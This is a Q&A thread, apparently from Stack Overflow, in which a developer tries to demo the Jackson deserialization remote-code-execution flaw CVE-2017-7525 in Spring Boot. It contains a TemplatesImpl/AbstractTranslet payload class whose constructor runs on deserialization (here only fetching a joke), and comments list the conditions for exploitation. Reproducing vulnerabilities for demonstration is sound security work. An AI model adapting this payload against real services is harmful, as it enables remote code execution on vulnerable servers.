# reproducing the jackson vulnerability CVE-2017-7525 using spring boot and custom java class

Tags: java, spring-boot, jackson, deserialization

I read about the ongoing jackson vulnerability(CVE-2017-7525) which allows for remote code execution, as explained[here](https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/). 
I did some modifications to the example class given on that page and wrote something like this:

```java
import java.io.*;
import java.net.*;

public class Exploit extends com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet {
  private static String urlString = "https://sv443.net/jokeapi/category/any?blacklistFlags=nsfwreligiouspolitical";
  public Exploit() throws Exception {
    StringBuilder result = new StringBuilder();
    URL url = new URL(urlString);
    HttpURLConnection conn = (HttpURLConnection) url.openConnection();
    conn.setRequestMethod("GET");
    BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
    String line;
    while ((line = rd.readLine()) != null) {
      result.append(line);
    }
    rd.close();
    //Lets see the joke in the logs
    System.out.println(result);
  }

  @Override
  public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.dtm.DTMAxisIterator iterator, com.sun.org.apache.xml.internal.serializer.SerializationHandler handler) {
  }

  @Override
  public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handler)  {
  }
}
```

Compiled the .java file and opened the generated .class file and passed its contents as part of the sample api request body provided, however it appears the the custom code may not have been executed (or so I think), I am expecting to see something on the application logs, printing the output of the request. However I do not see anything being printed.
Does anyone have a simple example that showcases this vulnerability using spring boot and jackson, through an api call using bogus jackson?

I understand this is an unusual question, but I am looking into this interesting topic hoping there is someone out there who has come across the need to demo this issue.

In short I am looking to demo this java deserialization vulnerability while using spring boot, jackson by making an api call and passing a Json document which contains the compiled java code to be executed.

Comment: have you checked what versions of jackson you have, as he mentioned, jackson has blacklisted some of the classes like `com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl`

Comment: and also he states `To exploit this issue, the user of the library must have enabled Default Typing (mapper.enableDefaultTyping), if this hasn’t been done, then the exploit here doesn’t work, as you aren’t able to create arbitrary objects.` so you have to manually enable this on jackson, so the exploit doesn't work out of the box.

Comment: also did you base64 encode the class in the payload?

Comment: It depends from version of `Jackson` you use. Some bugs were already fixed: [CVE-2017-7525 jackson-databind: Deserialization vulnerability via readValue method of ObjectMapper](https://github.com/FasterXML/jackson-databind/issues/1723), [Block more JDK types from polymorphic deserialization (CVE 2017-15095)](https://github.com/FasterXML/jackson-databind/issues/1737)

Comment: I forgot to do the encoding, and also to lower the version. Let me try to do the encoding, decreasing the version and enable the default typing.

Comment: @CarlosLuis could you share the answer if you are able to find how to reproduce.